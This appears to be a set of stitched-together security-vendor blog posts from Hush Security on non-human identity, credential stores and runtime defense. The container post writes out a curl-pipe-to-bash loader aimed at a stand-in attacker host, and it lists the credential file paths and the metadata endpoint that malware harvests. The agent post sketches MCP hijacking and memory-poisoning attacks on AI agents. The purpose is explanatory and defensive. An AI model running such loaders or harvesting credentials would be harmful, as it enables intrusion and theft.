Category: Identity Security

Zero Trust for AI agents is the right framework for this moment. Anthropic published their guide on it this month, and the thing I keep coming back to is how many of its controls rest on a single assumption: that you already have cryptographic, runtime identity for your agents and non-human workloads. Most organizations do not. That is the gap this post is about, and it is the gap Hush was built to close.

I want to say upfront that the guide is one of the best pieces of practical security writing I have seen on this topic. It is specific, grounded in real threats, and gives architects and engineers something actionable. If you build or secure AI-driven systems, read it. This post is my practitioner’s walkthrough, with a direct lens on where Hush fits into the implementation.

Why AI Agent Security Requires a New Zero Trust Approach

Most security frameworks describe what good looks like in theory. This one is grounded in what attacks already look like in practice. The opening observation alone is worth sitting with: frontier AI models are compressing the window between vulnerability and exploit from months to hours.

The framework introduces a design test worth applying to every control you currently have in place: does this make the attack impossible, or just tedious? Controls that work through friction, such as rate limits and non-standard ports, degrade significantly against an attacker operating at machine speed. I think that framing is exactly right.

Autonomous AI systems change the attack surface in ways traditional security models do not account for. Agents interpret natural language, invoke tools and MCP servers, maintain memory across sessions, and coordinate with other agents. A compromised MCP descriptor can silently redirect tool calls. A poisoned memory entry corrupts every session that follows. These are not hypothetical threats. The first malicious MCP server impersonating a legitimate email service, silently copying all outbound messages, was documented in the wild. The guide maps all of this carefully, and regulated industries in particular should pay attention: the framework aligns directly with HIPAA, FINRA, GDPR, and FedRAMP requirements that are already in force.

Non-Human Identity Is the Foundation Zero Trust for AI Agents Requires

The guide structures recommendations across three tiers: Foundation, Enterprise, and Advanced.

Foundation requires unique cryptographic identifiers for every agent instance, appearing in all logs and access requests.

Enterprise adds certificate-based authentication with lifecycle management.

Advanced moves to hardware-backed identity with attestation.

These tiers give teams a clear progression. Worth calling out directly: static API keys and embedded credentials are among the first things an attacker with model-assisted code analysis will find. The prescription is short-lived tokens issued by an identity provider, measured in minutes rather than days. That is exactly the model Hush is built around.

Hush issues credentials at the moment a workload needs access, scoped to the exact task, and expires them immediately after use. No long-lived secrets to rotate, audit, or accidentally expose. The SPIFFE framework underpins all of it, giving every workload and agent a verifiable runtime identity.

Agent Identity Verification: How Hush Maps to Each Zero Trust Tier

The table below maps each identity and authentication requirement from the guide to the corresponding Hush capability.

Tier	Framework Requirement	Hush Capability
Foundation	Unique cryptographic identifiers per agent instance; IDs appear in all logs and access requests.	Runtime discovery assigns persistent, cryptographically rooted identity to every workload, agent, and NHI. All telemetry is attributed to a specific identity automatically.
Enterprise	Certificate-based authentication with lifecycle management, rotation, and revocation.	Hush issues short-lived, just-in-time credentials at runtime and attest identity via the SPIFFE framework. Lifecycle is managed automatically. No manual rotation required.
Advanced	Hardware-backed identity stored in HSMs or TPMs. Remote attestation to verify agent integrity before granting access. Confidential computing enclaves for sensitive operations.	Hush operates on-premises and in hybrid environments, keeping credential issuance within the customer’s own infrastructure boundary. SPIFFE-based identity provides the cryptographic foundation that hardware-bound identity and attestation builds on.

Least Agency: The Access Control Principle Built for AI Agents

One concept I think deserves wider adoption is Least Agency, a term coined by OWASP and highlighted throughout the Anthropic framework. Least privilege constrains what a system can access. Least Agency goes further: it restricts what each agent tool can do, how often, and from where. An email-drafting agent needs email permissions, not access to the finance file share.

This matters because most credential systems are not built to express task-scoped permissions at the agent level. Approved actions, prohibited actions, escalation triggers, and scope limits all need to be explicit and enforced at the access layer, not just declared in agent instructions.

Hush enforces Least Agency through runtime policy. Machine-to-machine interactions are mapped continuously and converted into access policies that define exactly which workloads can reach which services. Any connection outside that policy is blocked at the point of access. The capabilities that deliver this:

• Runtime Visibility and Discovery: continuous discovery of every workload, service, and AI agent from code to production, including shadow credentials and NHIs not visible in static scans.
• Just-in-Time Scoped Access: credentials issued at the moment of access, scoped to the exact task, expired immediately after use. No standing access for agents to misuse.
• Runtime Posture Analysis: risks prioritized based on actual runtime behavior and blast radius, not static configuration.
• No Code or Application Changes: lightweight sensors run transparently in the background.

MCP Security and Supply Chain Risk for AI Agent Deployments

The framework’s section on MCP security and supply chain risk is one I recommend reading carefully. AI agent deployments compose capabilities at runtime, loading tools and personas dynamically from external sources. Traditional software composition analysis was not designed for this model, and the attack surface it creates is underappreciated.

Tool chaining attacks illustrate why this is hard to catch. An attacker does not need to compromise a single high-privilege tool. Instead, they manipulate an agent into combining two legitimate, low-privilege tools in a sequence that exposes data neither would surface on its own. Every command runs through trusted binaries under valid credentials, so host-based monitoring has nothing to flag. The access looks correct because the credentials are legitimate.

Running MCP servers on immutable infrastructure after code verification, signing them cryptographically, and requiring identity-based authentication for every tool connection is the right prescription. Hush enforces this at the access layer: every connection from an agent to a tool or service is governed by a named policy. If a workload is not explicitly authorized to reach a given service, the connection does not happen, regardless of what instructions the agent received. That external enforcement, sitting outside the agent itself, is what makes the control reliable.

Runtime Visibility and Incident Investigation for Non-Human Identities

Two metrics matter most before any other detection investment: dwell time, meaning how long from an anomaly to human awareness, and coverage, meaning the fraction of alerts actually investigated. Both depend entirely on attribution. Without knowing which specific agent instance made a decision or accessed a resource, you cannot trace the chain of events that produced an incident. You can measure that something went wrong. You cannot explain how.

Hush provides runtime telemetry with identity attribution for every workload and agent action. Because Hush facilitates the access itself, every connection is logged against the verified identity that initiated it. The visual lineage map shows exactly which agents connect to which services, what credentials they use, and when, giving security teams the starting point they need to reconstruct an incident rather than beginning from a pile of unattributed events. For teams dealing with compliance requirements around algorithmic explainability, that audit trail is not optional.

Implementing Zero Trust for AI Agents: Four Concrete Steps

The guide recommends beginning at Foundation and advancing tiers as deployments scale. Here is how to sequence that with Hush.

Step 1: Discover Every Non-Human Identity at Runtime

You cannot govern what you cannot see, and most teams discover NHIs and agents they did not know existed once runtime discovery is in place. Hush’s free tier provides continuous discovery across cloud, on-premises, and hybrid environments, building an inventory based on real-world usage rather than configuration assumptions. The first time most teams run it, something unexpected shows up.

Step 2: Map Your Static Secrets and Credential Exposure

Static API keys and embedded credentials are easier to find than most teams expect, and they are the first thing an AI-assisted attacker looks for. Hush detects exposed, leaked, and misconfigured secrets across code, cloud, and pipelines, surfaced with blast-radius prioritization so you know what to fix first and what the consequences of each exposure would be.

Step 3: Define Explicit Access Policies for Each Agent

An agent with vague permission to ‘help with customer service’ has no enforceable boundaries. Approved actions, prohibited actions, and scope limits need to be written down and enforced at the access layer. Hush converts observed machine-to-machine interactions into access policies automatically, giving you a starting point grounded in how your agents actually behave rather than how you assume they do.

Step 4: Replace Static Credentials with JIT Scoped Access

Start with the workload carrying the largest blast radius. Hush provisions just-in-time, scoped credentials at runtime and enforces policy at the point of access, with no code changes or infrastructure redesign required. Once one workload is running under JIT access the pattern is established. Expansion to the rest of the fleet follows the same process.

The Identity Access Layer That Makes Zero Trust for AI Agents Practical

What I find most valuable about the Anthropic framework is that it does not let you off the hook with vague principles. The tier structure forces a real question: are you at Foundation, or are you below it? Most teams, when they look honestly at their agent deployments, find they are below it. Not because they made bad decisions, but because the identity and access infrastructure the framework assumes has not existed in a practical, deployable form until recently.

That is what Hush is built to change. The framework sets the destination. We give you the access layer to get there from day one, without a multi-year infrastructure overhaul standing in the way.

If you want to see how it works in practice, get started for free or schedule a demo with the team.

If your platform holds OAuth tokens or API keys on their behalf, you already are.

This post is for you if your platform stores OAuth tokens or API keys on behalf of customers, provides integrations that act on users’ behalf (Zapier, Make, Nango, Composio, or similar), runs AI agents or automated workflows using customer credentials, or connects to tools like Slack, GitHub, Snowflake, HubSpot, or Workday. If none of those apply – this isn’t your problem yet. If one does – keep reading.

Think about the security team’s job description from five years ago.

You were responsible for your company’s credentials. Your service accounts.

Your API keys. Your team’s access to production systems. The perimeter was clear: protect what belongs to us.

Then something shifted – quietly, gradually, without a formal handoff.

AI agents started acting on behalf of users. Integration platforms started storing tokens to connect customer tools. Automation workflows started holding API keys to call third-party APIs on your customers’ behalf. Every new product feature that required access to a customer’s Slack, their GitHub, their Snowflake, their Workday – created a credential your platform now owned, stored, and was responsible for.

Nobody rewrote the security team’s mandate. Nobody drew a line in the org chart between “our credentials” and “credentials we hold for others.” It happened as a product decision, not a security one. The credential store grew one integration at a time, one customer at a time, and now it contains something nobody explicitly signed up to protect: the production access keys of every company that trusted you enough to connect their tools.

This is the new reality for security engineers and CISOs, mainly with  integration platforms, AI analytics companies, automation tools, and any SaaS product that acts on behalf of its customers. Your threat model doesn’t start and end with your own environment anymore. Your credential store is the threat model.

Most security teams at platforms like these don’t have a complete picture of what they’re holding until something forces them to look: at a compliance audit. A penetration test. A breach.

By the time an attacker forces that moment, it’s too late.

That’s the challenge this post is about – and why Composio’s May 2026 incident report is required reading for anyone building in this space.

Think of it like an earthquake.

The most destructive quake in a sequence is rarely the first one. There are foreshocks – smaller tremors nobody takes seriously. Then the main event hits. And then the aftershocks keep coming, spreading outward, each one weakening structures that were already cracked.

The Composio breach is that earthquake. And the fault line runs through every company that trusted them with credentials.

Each company in that second column had done nothing wrong. Their security controls hadn’t failed. They didn’t appear in the attacker’s initial target list. They were downstream – connected to Composio the way buildings are connected to the ground.

When the ground moves, they move with it.

And look at the third column (the customers of the customers). The blast radius doesn’t stop at Composio’s customers. It reaches their customers too – the end users, the employees, the data. Every level of the chain absorbs a shock it never felt coming and had no way to prepare for.

That’s what makes this threat model different from a standard breach. The earthquake happened in one place. The damage is affecting everywhere else.

The companies in that list didn’t feel the tremor. They felt the aftershock.

The math nobody is running

Every integration platform, AI agent infrastructure layer, and analytics connector that requires access to customer data operates on the same model: collect credentials at setup, store them, use them to service requests on the customer’s behalf. The secret store is how the product works.

The problem is what happens when that store becomes a target.

Composio’s May 2026 incident report gave a rare and unusually transparent window into what that exposure looks like in numbers. They disclosed that 0.3% of their active connections were in the blast radius of their breach. That 0.3% contained:

Now ask the question nobody in the post-incident coverage asked:

What does 100% look like?

If Composio’s 0.3% maps to roughly 5,000 connections, their full credential store contained approximately 1.7 million live credentials across hundreds of tools – each one a valid key to a real customer’s production environment.

That’s not a vulnerability in the traditional sense. That’s architecture. And it’s not unique to Composio. It’s the default state of every platform that holds customer credentials at scale.

Read the connector list differently

Security people instinctively reach for the big number. 5,001 GitHub tokens – that’s the headline. Source code, CI/CD pipelines, GitHub Actions secrets, private repos. Real damage.

Lets take a closer look on the 1 digit row exposed secret, and what it could affect 

Workday. One token. Workday is an HR system. A single compromised Workday OAuth token gives read access to employee records, compensation data, org charts, PII for an entire company’s workforce. One token. One company’s HR database. Entirely accessible.

Gong. One token. Gong records and transcribes every sales call. A compromised Gong integration exposes every recorded customer conversation, every deal discussed, every competitive intelligence shared on a call. For a sales-led company, that’s the whole game.

Metabase. One token. Metabase is a business intelligence tool that runs directly against production databases. A Metabase single  token isn’t access to a dashboard – it’s often access to the underlying data. Depending on configuration, it’s a query interface to your customer’s entire data warehouse.

Sentry. One token. Sentry captures exceptions and stack traces from production applications. That means function names, file paths, line numbers, and sometimes variable values at the moment of failure. It’s a map of application internals that an attacker with time can use to find the next vulnerability.

Vercel + Render. Deployment infrastructure. One token each. These aren’t data stores – they’re the keys to production deployments. Depending on permissions, a compromised Vercel token can trigger new deployments, pull environment variables, or access build logs that contain secrets.

Gmail × 12. Twelve email accounts. Email is the root of trust for almost everything else – password resets, 2FA codes, vendor communications. Twelve Gmail tokens in a compromised credential store aren’t twelve email inboxes. They’re twelve master keys.

That’s what 0.3% contains. Not a database of user records. Not a payment system. A set of live credentials with access to HR systems, communication infrastructure, BI tools, deployment pipelines, error monitoring, and source code.

The breach doesn’t stay inside your perimeter

Here’s what makes the integration platform threat model fundamentally different from a standard enterprise breach.

In a typical breach, the attacker gains access to your data. That’s serious. You do incident response, you notify affected parties, you remediate.

When an integration platform is breached, the attacker gains access to credentials for your customers’ environments. They never touch your customers’ networks. They never trigger an alert in your customers’ security tooling. The requests come from tokens that customers authorized. From IPs their tools have seen before.

The affected company finds out when someone tells them – or when the data is already being sold.

In the Anodot incident, a threat actor breached an AI analytics platform and used authentication tokens stored there to access Snowflake environments across a dozen customer organizations. The affected companies had done nothing wrong. Their security controls hadn’t failed. They were downstream victims of a breach they never experienced.

This is the domino effect . The first tile is your platform. The rest of them belong to your customers.

The governance questions that should keep a security architect awake

The instinct after reading an incident report is to think about controls at the point of breach: Tighter access to production systems, improved detection. Those matter.

But the deeper question is about the credential store itself – not how the attacker got in, but what they found when they arrived.

Most integration platforms can’t answer these questions with confidence:

How many credentials are you holding right now, and for whom? Not an approximation from your database. A live, queryable inventory with credential type, connected tool, scope, issuing user, creation date, and last-used timestamp.

Which of those credentials belong to users who no longer work at the company that authorized them? OAuth tokens don’t expire when employees leave. The token a developer granted to your platform in 2024, for a GitHub repo they managed, is still valid today if it was never explicitly revoked. Your system is holding a credential that the issuing company almost certainly doesn’t know about.

What do the scopes on your stored credentials actually allow – and how much of that do you use? Platforms typically request the scopes that make the integration work, or accept whatever the customer’s tool offers. Those scopes are rarely audited after issuance. A GitHub token with admin:org scope, stored because the integration needed repo:read, is sitting in your database right now.

What’s your revocation SLA? If you detect a breach at midnight, how long does it take to revoke all credentials associated with a specific customer? All credentials for a specific tool across all customers? All credentials in your system? If the answer involves any manual steps, the SLA is measured in hours, and the exfiltration window is measured in the same units.

Composio’s response to their May 2026 incident involved revoking OAuth tokens across ~100 tool integrations and asking customers to handle the rest. That’s an honest response. It’s not a fast one. And speed is the variable that determines blast radius.

What a governed credential store looks like architecturally

The solution isn’t fewer integrations or simpler architecture. It’s building the credential store with the security posture appropriate for what it actually is: a centralized store of third-party production access credentials that grows more valuable – and more dangerous – with every customer you add.

Credentials as first-class entities with lifecycle state. Every stored credential should have a lifecycle model: issued → active → dormant → expired/revoked. Transitions between states should trigger events. A credential moving from active to dormant after 90 days of inactivity should generate an alert. A credential that has never been used after 30 days should prompt a review.

Scope as a governed attribute, not a setup artifact. The scope granted at authorization time should be validated against what the integration actually requires, on an ongoing basis. Overprivileged credentials should be flagged and, where the tool supports it, downscoped via re-authorization.

Revocation as a first-class API operation. Revocation should be a single, fast, auditable operation – scoped to a customer, a tool, or the entire credential store. If it’s not, it’s a design debt that will cost you in your incident response window.

The uncomfortable truth about scale

There’s a tension that every integration platform security team lives with: the product gets better as connections deepen, and security gets harder as the credential store grows.

A platform with 10,000 connections has a manageable problem. A platform with 1.7 million has a different order of magnitude – one that requires automated governance, not periodic audits.

And the threat model shifts with scale. At 10,000 connections, you’re an interesting target. At 1.7 million connections across hundreds of tools, you’re one of the highest-value credential repositories in the systems of every company that uses your product.

The security architecture needs to reflect that. Not because something has gone wrong – but because of what you’ve built.

You’re not just holding an API key for a customer’s Slack integration. You’re holding the credential that unlocks their HR system, their deployment pipeline, their source code, their recorded sales calls, their production database – depending on which of your connectors they’ve enabled.

That’s a responsibility that deserves a dedicated security discipline. Not bolted onto standard SaaS security practices. Built for the specific problem of governing delegated credentials at scale.

At Hush Security, we work with platforms on exactly this problem – the discovery, lifecycle management, and governance of non-human identities that exist on behalf of your customers.

Your organization has been using the same Python 3.11 base image for six months. It passed all static security scanning when you pulled it. Your supply chain policy flagged no violations. Automated vulnerability checks found nothing. Yesterday, when one of your containers started in production, the ENTRYPOINT script executed a single line: curl https://attacker-controlled-server.com/payload.sh | bash. By the time that command returned, the container had exfiltrated every SSH key on the host, dumped AWS credentials from the instance metadata endpoint, and attempted to compromise the Kubernetes cluster. The malware was never in the image. Your scanner never saw it. It arrived in code that only executed at runtime.

This attack pattern is no longer theoretical. It is happening at scale across Docker Hub and private registries worldwide. And the uncomfortable truth is that your existing container security tooling is not designed to catch it.

How The Container Credential Leakage Attack Works

The malicious container image attack exploits a fundamental asymmetry in how container security works: static analysis scans images at rest. Malicious payloads execute at runtime. There is a gap between these two moments, and attackers have learned to hide in it.

Here is the attack chain in detail.

Stage 1: The Malicious Image

An attacker creates a Docker image that looks legitimate. It might be a typosquatted version of a popular base image (ubunto:20.04 instead of ubuntu:20.04), or it might be a straightforward image with a misleading name like python-slim or golang-runtime designed to suggest it is an official image even though it is not. The image includes all the normal components you would expect: OS packages, runtimes, development tools.

But the ENTRYPOINT or CMD instruction contains a tiny bootstrap script. Not the malicious payload itself. Just a loader.

ENTRYPOINT ["/bin/sh", "-c", "curl https://attacker.com/init.sh | bash && exec \"$@\""]

This script is small enough to pass visual inspection. It looks like a normal entrypoint wrapper. When the image is built and layers are committed, the script sits in the top layer alongside legitimate files. When the image is pushed to a registry and scanned, the script is visible but appears benign. It is just a curl command. Nothing unusual about that.

The actual malware — the code that harvests credentials and exfiltrates data — is not in the image. It lives on the attacker’s server. It only lands on the target machine when the container starts and that curl command executes.

Stage 2: Registry Distribution

The image gets pushed to Docker Hub, or it gets mirrored into your organization’s private container registry. In the public case, it starts accumulating pulls. A typosquatted image can get millions of downloads because developers typing fast or working in low-attention contexts will grab the wrong name. In the private case, a developer pulls what they think is a legitimate base image and uses it for their Dockerfile.

Your image scanning tools analyze the image layers. They check every dependency, every package, every binary against vulnerability databases. The scanner looks for known CVEs, license violations, and malicious components. The ENTRYPOINT curl command might be flagged as a shell injection risk. But it is a common pattern in production Docker images. It is not enough to block the image. The image passes policy. It is added to the repository.

Stage 3: Container Deployment

Your team, or hundreds of teams across your organization, use the image as a base:

FROM ubunto:20.04

RUN apt-get update && apt-get install -y ca-certificates curl

COPY app /app

WORKDIR /app

CMD ["python", "app.py"]

Static scanning on your build pipeline sees a clean base image. Dependency checks pass. The image is promoted to production. Thousands of containers spawn from it across your cluster.

Stage 4: Runtime Execution and Credential Harvesting

The container starts. The ENTRYPOINT executes. The curl command fires. It downloads a shell script from the attacker’s server, pipes it to bash, and executes it in the container’s process space with the container’s identity and filesystem access.

What happens next depends on the attacker’s payload. In the documented cases, the pattern is consistent:

Credential Harvesting: The script spawns a background process that crawls the filesystem for everything a cloud attacker wants. SSH private keys in ~/.ssh/. AWS credentials in ~/.aws/credentials and instance metadata endpoints at http://169.254.169.254. GCP ADC tokens at ~/.config/gcloud/. Azure CLI configs at ~/.azure/. Kubernetes service account tokens at /var/run/secrets/kubernetes.io/serviceaccount/token. Environment variables that might contain API keys. Git configurations with embedded credentials. Bash history showing commands that exposed secrets.

Data Exfiltration: The harvested material is encrypted with a session key, that key is wrapped in the attacker’s RSA public key, and the whole bundle is POSTed to a server controlled by the attacker. Only they have the private key. Even if the traffic is intercepted, the data is unreadable.

Lateral Movement: If the container is running in Kubernetes with a service account that has cluster-admin or overly permissive permissions, the malware uses the token to enumerate secrets across all namespaces, dump them, and attempt to schedule privileged pods on other nodes.

The container appears to function normally. Your monitoring shows CPU and memory usage as expected. The application logs show no errors. The attack is silent.

Secrets Leakage Container Attack

Here is what the attack looks like when traditional container security fails to catch it:

Figure 1: The Attack Uncaught. Credentials are harvested and exfiltrated to attacker infrastructure. Static image scanning, SCA tools, and network monitoring all miss the attack because the malicious payload executes at runtime, not in image layers.

Why Your Existing Container Security Tools Miss This

Your security stack includes several layers of defense, each one assumed to catch supply chain attacks. None of them are designed for this specific threat.

Container Image Scanning looks at the image layers before they run. It performs deep, recursive analysis of every component. It checks against CVE databases, malicious package feeds, and license compliance policies. But it is analyzing a static artifact — a tarball of files on disk. The malicious binary is not in that tarball. It is on the attacker’s server. The script that will fetch it is visible, but the script itself is not malicious code. It is a downloader. Static scanners cannot analyze what the curl command will return. They cannot execute the script in a sandbox and observe its behavior. They can flag the risky pattern (shell pipe to bash) but that pattern is too common in production images to block outright. The image passes.

Vulnerability scanning in your CI/CD pipeline works the same way. It runs on images before they are deployed. It checks dependencies. It finds nothing wrong.

Network egress controls might catch the exfiltration attempt, if you have strict allowlisting in place. Most organizations do not. Developer laptops almost never do. And even in production, the domain the malware connects to is often designed to blend in. update-service.cloudcdn.com or metrics-relay.internal.io. It looks legitimate in logs. Or it can even send data to benign known locations, like GitHub, effectively exfiltrating via git commits.

Kubernetes network policies do not run on the container before it starts. By the time the policy engine is evaluating traffic, the curl command has already executed and the exfiltration has begun.

Runtime container controls (seccomp profiles, AppArmor, read-only root filesystems) can slow down the attack, but they rarely stop it. A well-crafted payload works around them. And more importantly, most organizations have not deployed these controls at scale because they require deep knowledge of what each container actually needs to do.

The root cause is that all of these tools assume the code running inside the container at startup is trustworthy. They assume that if the image passed scanning, the image is safe. Supply chain attacks invalidate that assumption. An image that was legitimately scanned can become malicious at the moment it executes, if that execution includes downloading and running arbitrary code from the internet.

The Structural Problem: Static Secret Scanning vs Runtime Execution

The attack works because of a mismatch in the container security model. Images are scanned as static artifacts. Execution is a runtime process. Code does not need to exist in the image to run inside the container.

This is actually a feature. Many container images intentionally download and compile code at startup. They do this for good reasons: smaller image sizes, dynamic version selection, runtime configuration. But the same mechanism enables malicious payloads.

The response from defenders is usually to add more static controls. Scan earlier. Scan more aggressively. Use allowlists of approved registries. Check image signatures. None of these stop an attacker who has registered a typosquatted image on Docker Hub and signed it legitimately, or who has compromised a supply chain and injected the bootstrap script into an official image before it is signed.

The uncomfortable truth is that as long as your container security model is built on scanning static artifacts, you are vulnerable to attacks that fetch and execute code at runtime. Rotation and incident response are your primary tools. You will detect the attack by finding exfiltrated data in your cloud logs. Then you will rotate credentials, patch images, and rebuild containers.

Runtime Detection: The Different Security Model

At Hush, we build on a different premise: the runtime behavior is the security boundary. Credentials should not be files that any process can read. Access should not be gated by possession of secrets. And execution should be monitored and controlled by policy, not just by static image analysis.

Here is what that means in practice for this attack:

No Static Credentials to Harvest: When containers access AWS, GCP, Azure, databases, or APIs through Hush, they do not receive long-lived credentials to store on disk or in environment variables. They request short-lived, dynamically issued tokens scoped to exactly the permissions the current workload requires. There is no ~/.aws/credentials for the malware to find. No Kubernetes ClusterAdmin token sitting in a service account. No hardcoded database password in a ConfigMap. A credential harvester returns empty-handed because the credentials do not exist in the form it is looking for. If static credentials are mandatory, Hush makes sure to automatically rotate and revoke keys, voiding the exfiltration attempt shortly after.

eBPF-Based Non Human Identity Anomaly Detection: Hush’s sensor observes system calls at runtime without kernel modification or agent overhead. It tracks which processes open which files, which network connections they initiate, and which identities (credentials, API tokens, connection strings) are behind each action. In this attack, the sensor would observe the exact moment when the malicious behavior begins and alert before exfiltration completes.

Scoped, Time-Limited Access to Kubernetes: If the container is running in Kubernetes, the service account token it receives through Hush is scoped to the minimum permissions the workload actually needs and expires after a short TTL. A token that allows a pod to read its own namespace’s ConfigMaps cannot be used to enumerate cluster secrets or schedule pods. The API calls the malware makes return 403 (Forbidden). The attempt is logged.

Coordinated Remediation: When Hush detects malicious runtime behavior in a container, we immediately trace that container back to the source image. We identify all downstream consumers of that image across your deployments. The initial attack detection is not the end of the incident response. It is the start of a coordinated remediation that reaches every affected container in your organization.

Detect and Protect Secret Leakage at Container Runtime

Here is the same attack when Hush runtime monitoring is in place:

Figure 2: Attack Detected by Hush. Attack is detected and blocked before credentials are exfiltrated. Multi-stage runtime anomaly detection (1. unexpected process spawn, 2. credential file access, 3. unauthorized network egress) fires on attack initiation. Malicious image is identified and quarantined automatically.

Real-World Attack: Malicious Container Images on Docker Hub

The attack we have outlined is not theoretical. This pattern has been documented across hundreds of malicious images in public registries in recent campaigns.

Security researchers have discovered malicious container images on Docker Hub that use typosquatting to mimic legitimate base images. These images executed Python scripts at startup that downloaded cryptocurrency miners. The scripts appeared benign on the surface. The miners were compressed and embedded in ways that signature-based scanners missed. Popular images with misleading titles like azurenql accumulated over a million downloads before detection.

The most effective attacks follow a consistent pattern: they include only a tiny bootstrap script in the image layers. The heavy payload — the actual miner or credential stealer — is fetched and executed at runtime. Until the image runs, the compiled binary does not exist anywhere a static scanner can find it.

Campaigns using images with names like openjdk and golang were particularly sophisticated. The images had misleading titles designed to trick developers into thinking they were official releases. When run, they downloaded and compiled miners, then used the container’s resources for cryptocurrency mining. The attacks remained undetected for months because the mining process was small and quiet, and the bootstrap script looked like normal container initialization.

Defense Strategy: Beyond Static Image Scanning

If you pull base images from Docker Hub or other public registries, treat your supply chain as under active threat. The specific defenses:

Verify image provenance using digests: Do not pull images by name alone. Use image digests (the SHA256 hash of the image manifest). Verify the digest against the official source (the publisher’s GitHub, their documentation, or a signed checksum). If the image name has changed hands or the publisher account has been compromised, the digest will not match what you expect.

# Vulnerable: pulling by tag
docker pull ubuntu:20.04

# More secure: pulling by digest
docker pull ubuntu@sha256:12345abcde...

Implement image signing and verification: Use Cosign or similar tools to cryptographically verify that images have been signed by the publisher you expect. This does not prevent typosquatting (an attacker can sign their own images), but it does ensure you are getting what the publisher actually released.

Use private registries with gating policies: If you use a container registry, implement a policy that requires all images to pass security scanning before they are available to deployments. But understand that this catches known vulnerabilities, not novel runtime attacks.

Deploy runtime behavioral monitoring: This is where Hush comes in. Runtime behavioral monitoring can detect when a container does something it should not do, whether that is spawning an unexpected process, opening credential files, or making network connections to unauthorized domains. This catches attacks that static scanning cannot.

Audit and rotate credentials regularly: If credentials are present in your environment as static files or environment variables, assume they have been compromised if a malicious image has run in your infrastructure. Rotate all of them: SSH keys, cloud provider credentials, database passwords, API keys, and Kubernetes service account tokens. Use a solution that provides identity-based access, rather than file or env-based, and one that orchestrates automatic, timely rotation to minimize breach impact — don’t wait for a breach to happen or for “that time in the year”.

Beyond Static Checks: The Future Of Container And Secrets Security, From Code To Cloud

The attack on container base images puts a question to every engineering team: What would your organization’s security posture look like if a malicious image ran in your infrastructure for a week without crashing or raising alarms?

If the answer is that you would not know it happened until you discovered exfiltrated data in your cloud logs, or noticed cryptocurrency mining draining your cloud resources, or found lateral movement in your Kubernetes audit logs, that is a signal that your security model is too dependent on static checks and incident response.

We built Hush to make that question less frightening. By moving the security boundary from image artifacts to runtime behavior, by issuing credentials dynamically rather than storing them, and by monitoring for anomalies rather than waiting for post-incident forensics, we change the equation. The malicious payload can fetch whatever it wants. It still cannot exfiltrate credentials that do not exist. It still cannot move laterally with tokens that do not grant the permissions it needs. And it will be caught before it completes.

If you want to see what shift-left access, eliminating static credentials and implementing runtime detection looks like for your container infrastructure, we are happy to walk you through it.

Hush Security delivers a unified access and governance platform for AI and non-human identities, replacing secrets with verified identities and dynamic, just-in-time access policies.

The next malicious base image will pass your scanner. Hush makes sure it still can’t do anything with what it finds.

Let’s Fix That. Get a Demo

The Non-Human Identity Crisis

Over the past decade, cloud adoption and API-first architectures have exploded. Every microservice, CI/CD pipeline, third-party integration, and automation script requires credentials to function. Today’s organizations manage tens of thousands of API keys, service account tokens, certificates, and secrets, collectively known as Non-Human Identities (NHIs).

Unlike human identities, NHIs proliferate unchecked, rarely expire, and often hold excessive privileges. When the GitGuard leak exposed over 10 million secrets on GitHub, and when CircleCI’s breach compromised thousands of customer secrets, the industry woke up to a critical gap: we had no systematic way to manage, monitor, or secure non-human identities at scale.

This realization spawned a new category of NHI security tools. But three years in, organizations are still experiencing breaches. The problem? These tools aren’t solving the actual problem.

Why Current NHI Tools Are Failing

1. Limited Visibility: Log-Based Detection Misses the Full Picture

Most NHI tools rely on scanning logs, code repositories, and configuration files to detect exposed secrets. This approach has fundamental limitations:

• Integration-dependent blind spots – They only see what they’re integrated with. Secrets in proprietary systems, legacy applications, or new SaaS tools remain invisible.
• Point-in-time snapshots – Log scanning provides historical data, not real-time awareness of active secrets in production.
• Incomplete coverage requires tool sprawl – Organizations deploy multiple complementary tools (repo scanners, log analyzers, CSPM tools) just to achieve partial visibility, creating fragmented insights and operational complexity.

The result: You’re blind to a significant portion of your NHI attack surface.

2. Static Risk Posture: Not Risk-Based on Reality

Current tools assess risk based on static configurations, whether a secret is overprivileged, improperly scoped, or detected in a repository. But they lack runtime context:

• No visibility into actual usage – Is this API key actively being used? When was it last called? From where?
• No understanding of exploitability – Which secrets, if compromised, could actually cause damage versus dormant credentials with no real-world impact?
• No prioritization based on business context – Not all exposed secrets carry equal risk, but tools treat them uniformly, flooding teams with thousands of “critical” findings.

The result: Security teams drown in alerts they can’t prioritize, while truly critical risks hide in the noise.

3. No Effective Remediation: Jira Tickets Aren’t Security

Perhaps the most glaring failure: every existing tool considers opening a Jira ticket as “remediation.”

Here’s what actually happens:

• Tool detects an exposed secret
• Creates a ticket assigned to a developer
• Developer is already buried in work
• Ticket sits in backlog for weeks or months
• Secret remains exposed and exploitable

This isn’t remediation, it’s offloading responsibility and hoping someone eventually gets to it. Meanwhile:

• Developers lack context to prioritize the ticket
• Manual secret rotation is complex and error-prone
• Teams fear breaking production, so they delay
• The “remediated” number in dashboards is a fiction

The result: Organizations have impressive detection metrics but unchanged security outcomes.

4. The Treadmill Problem: Creation Outpaces Remediation

Even when teams heroically remediate dozens of exposed secrets, hundreds more are being created simultaneously:

• Developers spin up new services with hardcoded credentials
• CI/CD pipelines generate new API keys
• Third-party integrations add more service accounts
• Shadow IT proliferates unmanaged secrets

You’re running on a treadmill that’s speeding up. No matter how fast you remediate, the backlog grows. This approach cannot win long-term, it’s mathematically unsustainable.

The result: The NHI problem compounds over time despite significant investment in security tools.

So What Are Teams Ending Up Doing

Recognizing these gaps, organizations attempt to solve NHI security by combining multiple tools:

• NHI scanners – These tools provide limited visibility, primarily detecting only what they are directly connected to. They rely on log ingestion and can become costly for customers at scale.
• Vault or Secrets Manager – Almost every organization has one (or multiple), but these are storage solutions, not security tools. They’re safes where you store secrets; they don’t tell you which secrets are exposed, overprivileged, or actively exploited.
• CSPM tools – Offer limited visibility mostly for major cloud providers (AWS, GCP, Azure) and a limited set of supported applications, with no remediation capabilities, just more alerts to manually triage.

But this Frankenstein approach creates new problems:

• Fragmented visibility – Each tool shows a different piece of the puzzle; no unified view of your actual NHI risk
• Alert fatigue – Multiple tools generating overlapping alerts with no centralized prioritization
• No coordinated remediation – Each tool operates in isolation; rotating a secret in Vault doesn’t update the scanner’s findings
• Operational overhead – Security teams spend more time managing tools than managing risk

Companies experiencing major NHI-related breaches were already using these tools. Despite deploying scanners, vaults, and CSPM platforms, their non-human identities remained exploitable. Detection without prevention leaves the door wide open.

A New Approach Is Required

The fundamental problem is that existing tools treat NHI security as a detection problem when it’s actually a governance and access control problem.

